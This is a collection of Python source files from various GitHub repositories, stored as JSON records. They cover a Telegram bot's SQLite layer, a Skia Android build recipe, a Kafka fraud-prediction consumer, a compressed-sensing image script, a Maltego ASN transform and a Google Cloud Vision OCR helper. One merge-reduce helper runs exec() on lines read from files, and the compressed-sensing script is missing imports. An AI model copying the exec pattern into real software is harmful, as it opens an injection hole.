-> bool:\n \"\"\"\n Проверка есть ли в текущей сущности таковой type_sentence с language.\n Иначе говоря проверка на то существует ли таковая команда/предложение с конкретным языком (RUS/EN)\n \"\"\"\n self.__cur.execute('SELECT sentence '\n 'FROM sentences '\n 'WHERE type_sentence = ? and language = ?',\n (type_sentence, language))\n return len(self.__cur.fetchmany(1)).__bool__()\n\n def add_sentence(self, type_sentence: str, sentence: str, language: bool) -> bool:\n \"\"\"\n Добавление нового предложения в текущую сущность\n \"\"\"\n try:\n self.__cur.execute('INSERT INTO sentences(type_sentence, sentence, language) '\n 'VALUES(?, ?, ?)',\n (type_sentence, sentence, language))\n self.__base.commit()\n return True\n except Exception as ex:\n logger.warning(f'An error occurred when inserting data into the sentences entity\\n'\n f'{ex}')\n return False\n\n def update_sentence(self, type_sentence: str, sentence: str, language: bool) -> bool:\n \"\"\"\n Обновление предложения, которое соответствует конкретному type_sentence и language\n \"\"\"\n try:\n self.__cur.execute('UPDATE sentences '\n 'SET sentence = ? '\n 'WHERE type_sentence = ? and language = ?',\n (sentence, type_sentence, language))\n self.__base.commit()\n return True\n except Exception as ex:\n logger.warning(f'Errors occurred in the process of updating data in the entity entity\\n'\n f'{ex}')\n return False\n\n def set_photo_in_sentence(self, type_sentence: str, language: bool, photo_id: str) -> bool:\n try:\n self.__cur.execute('UPDATE sentences '\n 'SET photo_id = ? '\n 'WHERE type_sentence = ? and language = ?',\n (photo_id, type_sentence, language))\n self.__base.commit()\n return True\n except Exception as ex:\n logger.warning(f'An error occurred while adding photo to the sentences entity\\n'\n f'{ex}')\n return False\n\n def set_video_in_sentence(self, type_sentence: str, language: bool, video_id: str) -> bool:\n try:\n self.__cur.execute('UPDATE sentences '\n 'SET video_id = ? '\n 'WHERE type_sentence = ? and language = ?',\n (video_id, type_sentence, language))\n self.__base.commit()\n return True\n except Exception as ex:\n logger.warning(f'An error occurred while adding video_id to the sentences entity\\n'\n f'{ex}')\n return False\n\n def get_sentence(self, type_sentence: str, language: bool):\n self.__cur.execute('SELECT sentence '\n 'FROM sentences '\n 'WHERE type_sentence = ? and language = ?',\n (type_sentence, language))\n sentences = self.__cur.fetchmany(1)\n if sentences:\n return sentences[0][0]\n return 0\n\n def get_photo_id(self, type_sentence: str, language: bool):\n self.__cur.execute('SELECT photo '\n 'FROM sentences '\n 'WHERE type_sentence = ? and language = ?',\n (type_sentence, language))\n photo_id = self.__cur.fetchone()\n if photo_id:\n return photo_id[0]\n return 0\n\n def get_video_id(self, type_sentence: str, language: bool):\n self.__cur.execute('SELECT video_id '\n 'FROM sentences '\n 'WHERE type_sentence = ? and language = ?',\n (type_sentence, language))\n video_id = self.__cur.fetchone()\n if video_id:\n return video_id[0]\n return 0\n\n def __del__(self):\n self.__cur.close()\n self.__base.close()\n\n\nclass UsersDB:\n \"\"\"\n Сущность, которая будет содержать в себе всю информацию о пользователе\n \"\"\"\n # Атрибуты сущности:\n # 1. user_id - первичный ключ, который представляет собой ID пользователя из телеграм.\n # 2. language - языке, который использует пользователь. Так как в текущем приложении языка будет два и\n # расширение не планируется, то True - это RUS, а False - это EN\n # 3. city - страна пользователя.\n # 4. full_name - ФИО пользователя. Особенности: Кириллица\n # 5. sex - пол пользователя.\n # 6. birth_date - дата рождения. Особенности: от 18 лет\n # 7. phone_number - номер телефона.\n # 8. postal_code - почтовый индекс.\n # 9. address - адрес пользователя. Особенности: Кириллица\n # 10. email - электронная почта пользователя.\n # 11. purpose_registration - цель регистрации.\n def __init__(self):\n try:\n self.__base = sqlite3.connect(path)\n self.__cur = self.__base.cursor()\n # self.__cur.execute('''CREATE TABLE IF NOT EXISTS users(\n # user_id BIGINT PRIMARY KEY,\n # language BOOLEAN,\n # city VARCHAR(255),\n # full_name VARCHAR(255),\n # sex VARCHAR(255),\n # birth_date VARCHAR(255),\n # phone_number VARCHAR(255),\n # postal_code VARCHAR(255),\n # address VARCHAR(255),\n # email VARCHAR(255),\n # purpose_registration TEXT,\n # register_status BOOLEAN DEFAULT FALSE\n # )''')\n # self.__base.commit()\n except Exception as ex:\n logger.warning(f'Errors occurred while connecting to the users entity\\n'\n f'{ex}')\n\n def exists_user(self, user_id: int) -> bool:\n self.__cur.execute('SELECT user_id '\n 'FROM users '\n 'WHERE user_id = ?',\n (user_id, ))\n return len(self.__cur.fetchmany(1)).__bool__()\n\n def get_register_status(self, user_id: int) -> bool:\n self.__cur.execute('SELECT register_status '\n 'FROM users '\n 'WHERE user_id = ?',\n (user_id, ))\n register_status = self.__cur.fetchone()\n if register_status:\n return register_status[0]\n return False\n\n def add_user(self, user_id: int, language: bool, username: str) -> bool:\n \"\"\"\n Добавление пользователя в текущую сущность\n \"\"\"\n try:\n self.__cur.execute('INSERT INTO users(user_id, language, username) '\n 'VALUES(?, ?, ?)',\n (user_id, language, username))\n self.__base.commit()\n return True\n except Exception as ex:\n logger.warning(f'An error occurred when inserting data into the users entity\\n'\n f'{ex}')\n return False\n\n def add_form_data(self, user_id: int, city: str, full_name: str, sex: str, birth_date: str, phone_number: str,\n postal_code: str, address: str, email: str, purpose_registration: str) -> bool:\n \"\"\"\n Добавление данных о пользователе, после заполнения формы.\n \"\"\"\n try:\n self.__cur.execute('UPDATE users '\n 'SET city = ?, full_name = ?, sex = ?, birth_date = ?, phone_number = ?, '\n 'postal_code = ?, address = ?, email = ?, purpose_registration = ?, register_status = ?'\n 'WHERE user_id = ?',\n (city, full_name, sex, birth_date, phone_number, postal_code, address,\n email, purpose_registration, True, user_id))\n self.__base.commit()\n return True\n except Exception as ex:\n logger.warning(f'An error occurred when adding data from the form to the users model\\n'\n f'{ex}')\n return False\n\n def get_user(self, user_id: int) -> list:\n self.__cur.execute('SELECT * '\n 'FROM users '\n 'WHERE user_id = ?',\n (user_id, ))\n return self.__cur.fetchall()\n\n def get_language_user(self, user_id: int):\n self.__cur.execute('SELECT language '\n 'FROM users '\n 'WHERE user_id = ?',\n (user_id, ))\n language = self.__cur.fetchmany(1)\n if language:\n return language[0][0]\n return 0\n\n def __del__(self):\n self.__cur.close()\n self.__base.close()\n","repo_name":"EgorKondratyev/atomy","sub_path":"databases/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":12058,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"38489772470","text":"from recipe_engine import recipe_api\n\nimport default_flavor\nimport subprocess\n\n\n\"\"\"GN Android flavor utils, used for building Skia for Android with GN.\"\"\"\nclass GNAndroidFlavorUtils(default_flavor.DefaultFlavorUtils):\n def __init__(self, m):\n super(GNAndroidFlavorUtils, self).__init__(m)\n self._ever_ran_adb = False\n\n self.device_dirs = default_flavor.DeviceDirs(\n dm_dir = self.m.vars.android_data_dir + 'dm_out',\n perf_data_dir = self.m.vars.android_data_dir + 'perf',\n resource_dir = self.m.vars.android_data_dir + 'resources',\n images_dir = self.m.vars.android_data_dir + 'images',\n skp_dir = self.m.vars.android_data_dir + 'skps',\n svg_dir = self.m.vars.android_data_dir + 'svgs',\n tmp_dir = self.m.vars.android_data_dir)\n\n def _run(self, title, *cmd, **kwargs):\n with self.m.step.context({'cwd': self.m.vars.skia_dir}):\n return self.m.run(self.m.step, title, cmd=list(cmd), **kwargs)\n\n def _py(self, title, script, infra_step=True):\n with self.m.step.context({'cwd': self.m.vars.skia_dir}):\n return self.m.run(self.m.python, title, script=script,\n infra_step=infra_step)\n\n def _adb(self, title, *cmd, **kwargs):\n self._ever_ran_adb = True\n # The only non-infra adb steps (dm / nanobench) happen to not use _adb().\n if 'infra_step' not in kwargs:\n kwargs['infra_step'] = True\n return self._run(title, 'adb', *cmd, **kwargs)\n\n def compile(self, unused_target):\n compiler = self.m.vars.builder_cfg.get('compiler')\n configuration = self.m.vars.builder_cfg.get('configuration')\n extra_config = self.m.vars.builder_cfg.get('extra_config', '')\n os = self.m.vars.builder_cfg.get('os')\n target_arch = self.m.vars.builder_cfg.get('target_arch')\n\n assert compiler == 'Clang' # At this rate we might not ever support GCC.\n\n extra_cflags = []\n if configuration == 'Debug':\n extra_cflags.append('-O1')\n\n ndk_asset = 'android_ndk_linux'\n if 'Mac' in os:\n ndk_asset = 'android_ndk_darwin'\n elif 'Win' in os:\n ndk_asset = 'n'\n\n quote = lambda x: '\"%s\"' % x\n args = {\n 'ndk': quote(self.m.vars.slave_dir.join(ndk_asset)),\n 'target_cpu': quote(target_arch),\n }\n\n if configuration != 'Debug':\n args['is_debug'] = 'false'\n if 'Vulkan' in extra_config:\n args['ndk_api'] = 24\n args['skia_enable_vulkan_debug_layers'] = 'false'\n if 'FrameworkDefs' in extra_config:\n args['skia_enable_android_framework_defines'] = 'true'\n if extra_cflags:\n args['extra_cflags'] = repr(extra_cflags).replace(\"'\", '\"')\n\n gn_args = ' '.join('%s=%s' % (k,v) for (k,v) in sorted(args.iteritems()))\n\n gn = 'gn.exe' if 'Win' in os else 'gn'\n ninja = 'ninja.exe' if 'Win' in os else 'ninja'\n gn = self.m.vars.skia_dir.join('bin', gn)\n\n self._py('fetch-gn', self.m.vars.skia_dir.join('bin', 'fetch-gn'))\n self._run('gn gen', gn, 'gen', self.out_dir, '--args=' + gn_args)\n self._run('ninja', ninja, '-C', self.out_dir)\n\n def install(self):\n self._adb('mkdir ' + self.device_dirs.resource_dir,\n 'shell', 'mkdir', '-p', self.device_dirs.resource_dir)\n\n\n def cleanup_steps(self):\n if self._ever_ran_adb:\n self.m.run(self.m.python.inline, 'dump log', program=\"\"\"\n import os\n import subprocess\n import sys\n out = sys.argv[1]\n log = subprocess.check_output(['adb', 'logcat', '-d'])\n for line in log.split('\\\\n'):\n tokens = line.split()\n if len(tokens) == 11 and tokens[-7] == 'F' and tokens[-3] == 'pc':\n addr, path = tokens[-2:]\n local = os.path.join(out, os.path.basename(path))\n if os.path.exists(local):\n sym = subprocess.check_output(['addr2line', '-Cfpe', local, addr])\n line = line.replace(addr, addr + ' ' + sym.strip())\n print line\n \"\"\",\n args=[self.m.vars.skia_out.join(self.m.vars.configuration)],\n infra_step=True,\n abort_on_failure=False)\n\n # Only shutdown the device and quarantine the bot if the first failed step\n # is an infra step. If, instead, we did this for any infra failures, we\n # would shutdown too much. For example, if a Nexus 10 died during dm\n # and the following pull step would also fail \"device not found\" - causing\n # us to run the shutdown command when the device was probably not in a\n # broken state; it was just rebooting.\n if (self.m.run.failed_steps and\n isinstance(self.m.run.failed_steps[0], recipe_api.InfraFailure)):\n self._adb('shut down device to quarantine bot', 'shell', 'reboot', '-p')\n\n if self._ever_ran_adb:\n self._adb('kill adb server', 'kill-server')\n\n def step(self, name, cmd, **kwargs):\n app = self.m.vars.skia_out.join(self.m.vars.configuration, cmd[0])\n self._adb('push %s' % cmd[0],\n 'push', app, self.m.vars.android_bin_dir)\n\n sh = '%s.sh' % cmd[0]\n self.m.run.writefile(self.m.vars.tmp_dir.join(sh),\n 'set -x; %s%s; echo $? >%src' %\n (self.m.vars.android_bin_dir, subprocess.list2cmdline(map(str, cmd)),\n self.m.vars.android_bin_dir))\n self._adb('push %s' % sh,\n 'push', self.m.vars.tmp_dir.join(sh), self.m.vars.android_bin_dir)\n\n self._adb('clear log', 'logcat', '-c')\n self.m.python.inline('%s' % cmd[0], \"\"\"\n import subprocess\n import sys\n bin_dir = sys.argv[1]\n sh = sys.argv[2]\n subprocess.check_call(['adb', 'shell', 'sh', bin_dir + sh])\n try:\n sys.exit(int(subprocess.check_output(['adb', 'shell', 'cat',\n bin_dir + 'rc'])))\n except ValueError:\n print \"Couldn't read the return code. Probably killed for OOM.\"\n sys.exit(1)\n \"\"\", args=[self.m.vars.android_bin_dir, sh])\n\n def copy_file_to_device(self, host, device):\n self._adb('push %s %s' % (host, device), 'push', host, device)\n\n def copy_directory_contents_to_device(self, host, device):\n # Copy the tree, avoiding hidden directories and resolving symlinks.\n self.m.run(self.m.python.inline, 'push %s/* %s' % (host, device),\n program=\"\"\"\n import os\n import subprocess\n import sys\n host = sys.argv[1]\n device = sys.argv[2]\n for d, _, fs in os.walk(host):\n p = os.path.relpath(d, host)\n if p != '.' and p.startswith('.'):\n continue\n for f in fs:\n print os.path.join(p,f)\n subprocess.check_call(['adb', 'push',\n os.path.realpath(os.path.join(host, p, f)),\n os.path.join(device, p, f)])\n \"\"\", args=[host, device], infra_step=True)\n\n def copy_directory_contents_to_host(self, device, host):\n self._adb('pull %s %s' % (device, host), 'pull', device, host)\n\n def read_file_on_device(self, path, **kwargs):\n rv = self._adb('read %s' % path,\n 'shell', 'cat', path, stdout=self.m.raw_io.output(),\n **kwargs)\n return rv.stdout.rstrip() if rv and rv.stdout else None\n\n def remove_file_on_device(self, path):\n self._adb('rm %s' % path, 'shell', 'rm', '-f', path)\n\n def create_clean_device_dir(self, path):\n self._adb('rm %s' % path, 'shell', 'rm', '-rf', path)\n self._adb('mkdir %s' % path, 'shell', 'mkdir', '-p', path)\n","repo_name":"RaziaSandhu/Drawings","sub_path":"skia/infra/bots/recipe_modules/flavor/gn_android_flavor.py","file_name":"gn_android_flavor.py","file_ext":"py","file_size_in_byte":7405,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"5073562337","text":"#!/usr/bin/python3\n\nimport os\nimport json\nimport pickle\nimport pandas as pd\nimport connection\nfrom kafka import KafkaConsumer\nfrom category_encoders import OrdinalEncoder\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\ndef transform(df):\n df = df.drop(['Id', 'logTimestamp'], axis=1)\n df.columns = ['device', 'activity']\n encoder = OrdinalEncoder()\n df = encoder.fit_transform(df)\n return df\n\nif __name__ == '__main__':\n\n consumer = KafkaConsumer('aaa', bootstrap_servers='localhost')\n\n for message in consumer:\n\n data = json.loads(message.value)\n df = pd.DataFrame([data])\n df.to_sql('user_activity', connection.warehouse(), if_exists='append', index=False)\n print(f'Records = {data}')\n\n model = pickle.load(open(os.getcwd()+'/model/model.pkl', 'rb'))\n prediction = 'Not Fraud' if model.predict(transform(df)) == 0 else 'Fraud'\n\n df = pd.DataFrame([{'Id': data['Id'], 'userFlag':prediction}])\n df.to_sql('user_fraud', connection.warehouse(), if_exists='append', index=False)\n print(f'Prediction: {prediction}')\n","repo_name":"isa96/kafka-stream-processing","sub_path":"consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"72989586772","text":"def filetolist(filename):\n\tinfile = open(filename, 'r')\n\toutlist = []\n\tfor line in infile:\n\t\texec(\"tmp = \" + line.rstrip())\n\t\toutlist.append(tmp)\n\tinfile.close()\n\treturn outlist\n\t\ndef listtofile(filename, l):\n\toutfile = open(filename, 'w')\n\tfor item in l:\n\t\toutfile.write(str(item) + '\\n')\n\toutfile.close()\n\t\ndef getnext(infile):\n\ttmp = infile.readline().rstrip()\n\tif tmp == '':\n\t\treturn None\n\telse:\n\t\texec (\"outtmp = \" + tmp)\n\t\treturn outtmp\n\n\t\n\t\ndef doreduce(infilename1, infilename2, outfilename):\n\tinfile1 = open (infilename1, 'r')\n\tinfile2 = open (infilename2, 'r')\n\toutfile = open (outfilename, 'w')\n\t\n\ti = getnext(infile1)\n\tj = getnext(infile2)\n\t\n\twhile (i != None and j != None):\n\t\tif (i[0] < j[0]):\n\t\t\toutfile.write(str(i) + '\\n')\n\t\t\ti = getnext(infile1)\n\t\telif(j[0] < i[0]):\n\t\t\toutfile.write(str(j) + '\\n')\n\t\t\tj = getnext(infile2)\n\t\telse:\n\t\t\ttmp = (i[0], i[1] + j[1])\n\t\t\toutfile.write(str(tmp) + '\\n')\n\t\t\ti = getnext(infile1)\n\t\t\tj = getnext(infile2)\n\t\n\twhile (i != None) :\n\t\toutfile.write(str(i) + '\\n')\n\t\ti = getnext(infile1)\n\t\t\n\twhile (j != None) :\n\t\toutfile.write(str(j) + '\\n')\n\t\tj = getnext(infile2)\n\t\n\tinfile1.close()\n\tinfile2.close()\n\toutfile.close()\n","repo_name":"brmj/distrubuted_systems_group_project","sub_path":"GroupProject/libs/Lib/sortreduce.py","file_name":"sortreduce.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11017824741","text":"import os\nimport pathlib\n\nimport appdirs\n\nfrom labm8.py import app\n\nFLAGS = app.FLAGS\n\n\ndef GetCacheDir() -> pathlib.Path:\n \"\"\"Resolve the cache directory for linters.\"\"\"\n _BAZEL_TEST_TMPDIR = os.environ.get(\"TEST_TMPDIR\")\n if _BAZEL_TEST_TMPDIR:\n cache_dir = pathlib.Path(os.environ[\"TEST_TMPDIR\"]) / \"cache\"\n else:\n cache_dir = pathlib.Path(\n appdirs.user_cache_dir(\"phd_format\", \"Chris Cummins\", version=app.VERSION)\n )\n cache_dir.mkdir(parents=True, exist_ok=True)\n return cache_dir\n","repo_name":"ChrisCummins/phd","sub_path":"tools/format/app_paths.py","file_name":"app_paths.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":181,"dataset":"github-code","pt":"67"} +{"seq_id":"1350048063","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#==============================================================================\n\n\"\"\"\nBlock Compressed Sensing\nSmoothed Projected Landweber\n@author: nacho\n\"\"\"\nimport sys\nimport numpy as np\nfrom numpy.random import default_rng\nimport argparse\nimport patch_mapping as patmap\nimport paco.linop as linop\nfrom skimage import io as imgio\nimport scipy.signal as dsp\n\nrng = default_rng(1863699)\n\n#==============================================================================\n\ndef create_proj_op(m,nproj,type='random'):\n if nproj > 0:\n K = nproj\n else:\n K = int(m/5)\n print(\"Taking \",K,\" measurements per block\")\n if type == 'random' or type == 'binary':\n Wn = rng.normal(size=(m,m))\n # EXPERIMENTAL: add DC term\n Wn[0,:] = 1.0/np.sqrt(m)\n Pk = Wn[:K,:]\n _,_,P = np.linalg.svd(Pk,full_matrices=False)\n if type == 'binary':\n P = 1-2*(P>0)\n #\n # normalize\n #\n nP = np.sum(P**2,axis=1)\n W = np.diag(1.0/np.sqrt(nP))\n P = np.dot(W,P)\n return P\n else:\n return None\n\n\n#==============================================================================\n\nif __name__ == '__main__':\n epilog = \"Output image file name is built from input name and parameters.\"\n parser = argparse.ArgumentParser(epilog=epilog)\n parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\")\n parser.add_argument(\"-w\", \"--width\", type=int, default=16,\n help=\"patch width\")\n parser.add_argument(\"--lam\", type=float, default=6,\n help=\"Thresholding parameter\")\n parser.add_argument(\"--kappa\", type=float, default=0.6,\n help=\"Thresholding parameter decrease (0.6 from paper)\")\n parser.add_argument(\"--max-iter\", type=int, default=100,\n help=\"Maximum ADMM iterations\")\n parser.add_argument(\"-e\", \"--eps\", type=float, default=1e-5,\n help=\"Smoothing constant in L1 weights estimation.\")\n parser.add_argument(\"--proj-num\", type=int, default=50,\n help=\"Number of compressed sensing projections.\")\n parser.add_argument(\"--proj-type\", type=str, default=\"random\",\n help=\"Type of compressed sensing operator (random, binary, dct, idct).\")\n parser.add_argument(\"--inner-tol\", type=float, default=5e-4,\n help=\"Tolerance for inner ADMM.\")\n parser.add_argument(\"--outer-tol\", type=float, default=5e-4,\n help=\"Tolerance for outer ADMM.\")\n parser.add_argument(\"--inner-maxiter\", type=int, default=100,\n help=\"Maximum number of iterations in inner ADMM.\")\n\n parser.add_argument(\"input\", help=\"input image file\")\n parser.add_argument(\"output\", default=\"\", help=\"recovered image file\")\n args = parser.parse_args()\n\n cmd = \" \".join(sys.argv)\n print((\"Command: \" + cmd))\n print(args)\n #\n #\n # parametros (por ahora mejores para desfile1 por lo menos)\n #\n # buenos parametros: 4x8x8+1+2+#\n width = args.width\n stride = width # args.stride\n\n Itrue = imgio.imread(args.input)\n Itrue = patmap.pad_image(Itrue,width,stride)\n M,N = Itrue.shape\n nrows,ncols = Itrue.shape\n npixels = nrows*ncols\n\n Xtrue = patmap.extract(Itrue,width,stride)\n\n n,m = Xtrue.shape\n print(\"Signal dimension =\",m)\n print(\"Number of blocks =\",n)\n P = create_proj_op(m,args.proj_num,args.proj_type)\n aux = np.eye(m)\n w = int(np.sqrt(m))\n D = np.empty((m,m))\n linop.dct2d(aux,w,w,D)\n G = np.dot(D.T,D)\n W = np.diag(1.0/np.diag(np.sqrt(G)))\n D = np.dot(D,W)\n G = np.dot(D.T,D)\n\n K = P.shape[0]\n B = np.dot(Xtrue,P.T)\n nsamples = n*K\n cratio = n*K / npixels\n print(\"Compression ratio (compressed samples / recovered samples)=\",cratio)\n\n print(\"Running algorithm\")\n dif = 1e20\n I = np.zeros(Itrue.shape)\n Y = np.zeros((n,m))\n Z = np.zeros((n,m))\n prevY = np.zeros(Y.shape) # and its previous value\n J = np.empty(Itrue.shape) # reconstructed image\n Rxx = 0.01*np.eye(m)\n Y = np.dot(np.dot(B,P),np.linalg.inv(np.dot(P.T,P)+Rxx))\n I = patmap.stitch(Y,width,stride,nrows,ncols)\n imgio.imsave('0.png',I)\n #\n # main ADMM loop\n #\n lam = args.lam\n for i in range(args.max_iter):\n # smoothing (on whole image)\n I = dsp.wiener(I,(3,3))\n # Y = patches(I)\n Y[:] = patmap.extract(I, width, stride)\n # landweber iteration (on patches)\n Y = Y + np.dot(B - np.dot(Y,P.T),P)\n #\n # projection\n #\n Z = np.dot(Y,D.T)\n sigma = np.median(np.abs(Z))/0.6745\n tau = lam * sigma * np.sqrt(2*np.log(M*N))\n Z[np.abs(Z) < tau] = 0\n Y = np.dot(Z,D)\n #\n # another landweber iteration\n #\n Y = Y + np.dot(B - np.dot(Y,P.T),P)\n #\n # stitch\n #\n I = patmap.stitch(Y,width,stride,nrows,ncols)\n dY = np.linalg.norm(Y - prevY, 'fro') / (1e-10 + np.linalg.norm(Y, 'fro'))\n #\n # reduce lambda (paper does it)\n #\n lam *= args.kappa\n Xerr = np.linalg.norm(Y - Xtrue, 'fro') / np.linalg.norm(Xtrue, 'fro')\n merr = np.linalg.norm(np.dot(Y, P.T) - B, 'fro') / np.linalg.norm(B)\n Ierr = np.sqrt(np.mean((I-Itrue)**2))\n psnr = 20*np.log10(1.0/Ierr)\n print(f\"i={i:5} dX={dY:8.5f} MSE={Ierr:8.5f} PSNR={psnr:8.5f}\")\n I = np.minimum(1.0,np.maximum(0.0,I))\n imgio.imsave(f\"iter{i:04d}.png\",I,cmap=cm.gray)\n if dY < args.outer_tol:\n print('converged to tolerance.')\n break\n #\n # GUARDAR SALIDA\n #\n plt.imsave(args.output,I,cmap=cm.gray)\n#==============================================================================\n","repo_name":"nacho-pancho/paco-bcs","sub_path":"code/bcs_spl.py","file_name":"bcs_spl.py","file_ext":"py","file_size_in_byte":5865,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"32092083744","text":"from maltego_trx.maltego import UIM_TYPES\nfrom maltego_trx.entities import Netblock, ASNumber, DNS\nfrom tasks.additions_entities import Company\nfrom tasks.MaltegoLampyre import EnterParamsFake, WriteLog, WriterResult\nimport tasks.asn_by_ip as module_exec\nfrom maltego_trx.transform import DiscoverableTransform\n\nimport ipaddress\n\ndef get_network(cidr: str):\n try:\n return ipaddress.IPv4Network(cidr)\n except ipaddress.AddressValueError:\n try:\n return ipaddress.IPv6Network(cidr)\n except ipaddress.AddressValueError:\n return None\n except:\n return None\n\nclass EnterParamas_Netblock(EnterParamsFake):\n def __init__(self, ips):\n self.ips = ips\n\n\nclass ASNIPtoBlock(DiscoverableTransform):\n\n @classmethod\n def create_entities(cls, request, response):\n asnnumber = None\n netblock_record = [request.Value]\n try:\n params = EnterParamas_Netblock(netblock_record)\n rows = WriterResult()\n module_exec.IPandASNmapping().execute(params, rows, WriteLog, None)\n\n if len(rows.rows) > 0:\n for row in list(filter(lambda x: len(x['Announced_Prefix']) > 0, rows.rows)):\n _block_result = get_network(row['Announced_Prefix'])\n if _block_result:\n ip1, ip2 = _block_result[0], _block_result[-1]\n _record_str = f\"{ip1}-{ip2}\"\n response.addEntity(Netblock, _record_str)\n label = f\"Country: {row['Country']}\"\n response.entities[-1].setLinkLabel(label)\n\n if len(row['ASN']) > 2:\n asnnumber = row['ASN'][2:]\n response.addEntity(ASNumber, asnnumber)\n label = f\"Country: {row['Country']}\"\n response.entities[-1].setLinkLabel(label)\n\n if len(row['ASN_Name']) > 0:\n\n if row['Country'].strip() != row['ASN_Name']:\n response.addEntity(Company, row['ASN_Name'])\n label = f\"Country: {row['Country']}\"\n response.entities[-1].setLinkLabel(label)\n\n if len(row['Prefix_Description']) > 0:\n response.addEntity(Company, row['Prefix_Description'])\n label = f\"Country: {row['Country']}\"\n response.entities[-1].setLinkLabel(label)\n\n if len(row['rDNS']) > 0:\n if '.' in row['rDNS']:\n\n response.addEntity(DNS, row['rDNS'])\n if asnnumber:\n label = f\"AS: {asnnumber}\"\n response.entities[-1].setLinkLabel(label)\n\n for i in response.entities:\n i.setLinkColor(\"#660066\")\n except Exception as e:\n response.addUIMessage(\"Error: \" + str(e), UIM_TYPES[\"partial\"])\n\n","repo_name":"JohnEskimSmith/Maltego-Examples","sub_path":"UnionProject/transforms/ASNIPtoBlock.py","file_name":"ASNIPtoBlock.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"7415363361","text":"from torchvision.transforms import ToPILImage, PILToTensor\nimport sys\nsys.path.insert(0, \"../\")\nimport properties as properties\nimport utils\nfrom PIL import Image\nfrom io import BytesIO\nimport json\n\n\nimport subprocess\nfrom google.cloud import vision\n\n\nimport torch\nfrom torchvision import io\n\nimport base64\nimport time\n\nimport traceback\n\nVISION_API_ENDPOINT = \"https://vision.googleapis.com/v1/images:annotate\"\n\n\ndef encode_image(image_path):\n with open(image_path, \"rb\") as image_file:\n return base64.b64encode(image_file.read())\n\n\nclass GcloudHelper:\n def __init__(\n self, empty_char=properties.empty_char, is_eval=False, mock_response=False\n ):\n \"\"\"Google Cloud Vision API text revognition class\n\n Args:\n empty_char (str, optional): Empty character mapping. Defaults to properties.empty_char.\n is_eval (bool, optional): Specify if ocr evaluation is being performed. Defaults to False.\n \"\"\"\n print(\"Initializing Gcloud helper\")\n self.empty_char = empty_char\n self.is_eval = is_eval\n self.client = vision.ImageAnnotatorClient()\n self.mock_response = mock_response\n\n self.count_calls = 0\n self.count_exceptions = 0\n print(\"Gcloud helper initialized\")\n\n def get_image_bytes(self, image):\n img = ToPILImage()(image)\n img_buffer = BytesIO()\n img.save(img_buffer, format=\"PNG\") # Store image in memory as a buffer\n return img_buffer.getvalue()\n\n def get_labels(self, imgs):\n \"\"\"Obtain text labls for a batch of images\n\n Args:\n imgs (torch.tensor): Batch of word images\n\n Returns:\n list[str]: List of labels extracted using the OCR\n \"\"\"\n labels = []\n for i in range(imgs.shape[0]):\n img_bytes = self.get_image_bytes(imgs[i])\n start = time.time()\n image = vision.Image(content=img_bytes)\n response = self.client.text_detection(image)\n end = time.time()\n try:\n texts = response.text_annotations\n if len(texts) == 0:\n labels.append(self.empty_char)\n continue\n # At least one text label was extracted\n label = texts[0].description # Multiple detections possible. We always pick first detection,\n if label == \"\":\n label = self.empty_char\n if self.is_eval:\n labels.append(label)\n continue \n label = utils.get_ununicode(label)\n for c in label:\n if c not in properties.char_set:\n label = label.replace(c, \"\")\n if len(label) > properties.max_char_len:\n label = self.empty_char\n labels.append(label)\n except:\n print(traceback.format_exc())\n print(f\"Image Shape - {imgs[i].shape}\")\n print(\"Response\")\n print(response)\n print(\"Exception Raised. Skipping image\")\n print(f\"Request-Response time - {(end - start) * 1000}\")\n labels.append(self.empty_char)\n self.count_exceptions += 1\n if self.count_exceptions > 20:\n print(f\"More than {self.count_exceptions} exceptions. Exiting...\") # Limit number of failures\n exit()\n continue\n\n return labels\n\n def get_labels_fullimage(self, image):\n label_bboxes = list()\n h, w = image.shape[-2:]\n img_bytes = self.get_image_bytes(image)\n print(\"Sending request\")\n start = time.time()\n if self.mock_response:\n response = json.load(\n open(\"/home/ganesh/projects/def-nilanjan/ganesh/Gradient-Approx-to-improve-OCR/output.json\"))\n else:\n image = vision.Image(content=img_bytes)\n response = self.client.text_detection(image)\n self.count_calls += 1\n print(\"Response Received\")\n end = time.time()\n print(f\"Time taken - {(end - start) * 1000}\")\n texts = response.text_annotations\n \n # Get all words + bboxes for full document image\n for text_info in texts:\n verts = text_info.bounding_poly.vertices\n bbox = dict()\n bbox[\"label\"] = text_info.description\n getattr(verts[0], \"x\", 0), getattr(verts[0], \"y\", 0)\n bbox[\"x1\"], bbox[\"y1\"] = getattr(verts[0], \"x\", 0), getattr(verts[0], \"y\", 0)\n bbox[\"x2\"], bbox[\"y2\"] = getattr(verts[1], \"x\", w-1), getattr(verts[1], \"y\", 0)\n bbox[\"x3\"], bbox[\"y3\"] = getattr(verts[2], \"x\", w - 1), getattr(verts[2], \"y\", h - 1)\n bbox[\"x4\"], bbox[\"y4\"] = getattr(verts[3], \"x\", 0), getattr(verts[3], \"y\", h - 1)\n label_bboxes.append(bbox)\n return label_bboxes\n\n\nif __name__ == \"__main__\":\n img = Image.open('/home/ganesh/projects/def-nilanjan/ganesh/datasets/1.png').convert(\"L\")\n # img = Image.open(\n # \"/home/ganesh/projects/def-nilanjan/ganesh/datasets/5_Tel_141.png\"\n # ).convert(\"L\")\n # file_name = os.path.abspath()\n # img = io.read_image(file_name, io.ImageReadMode.GRAY)\n img = PILToTensor()(img)\n # img = torch.ones((1, 1, 1), dtype=torch.uint8)\n imgs = torch.cat([img])\n\n obj = GcloudHelper()\n labels = obj.get_labels_fullimage(imgs)\n 